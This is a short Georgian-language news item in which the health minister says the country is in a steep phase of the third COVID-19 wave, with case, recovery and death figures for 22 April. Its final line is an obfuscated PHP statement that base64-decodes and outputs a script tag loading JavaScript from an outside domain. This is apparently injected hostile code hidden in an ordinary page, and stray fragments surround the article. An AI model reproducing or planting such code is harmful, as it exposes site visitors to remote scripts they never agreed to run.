celsiusi
ავერსი შნაიდერი
ჯანდაცვის მინისტრის, ეკატერინე ტიკარაძის განცხადებით, მესამე ტალღის "პიკურ ეტაპზე" არ ვიმყოფებით, თუმცა ვართ "საკმაო ციცაბო პერიოდში". ამის შესახებ მან რუსთავი 2-ის ეთერში ისაუბრა.
 
"ამ ეტაპზე ჩვენ მესამე ტალღის პიკურ ეტაპზე ნამდვილად არ ვართ, თუმცა ჩვენ ვიმყოფებით საკმაო ციცაბო პერიოდში, როდესაც ინფექცია ძალიან სწრაფად ვრცელდება. აქედან გამომდინარე, ეს ყოველივე მოითხოვს ძალიან ზედმიწევნით დაცვას ყველა იმ ღონისძიების, რომელიც არაერთხელ არის მოწოდებული ჯანდაცვის ექსპერტების მხრდიან", - განაცხადა ტიკარაძემ.
 
22 აპრილის მონაცემებით, საქართველოში კორონავირუსის 1 226 ახალი შემთხვევა დადასტურდა, გამოჯანმრთელდა 688, ხოლო გარდაიცვალა 10 ადამიანი.
1903
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");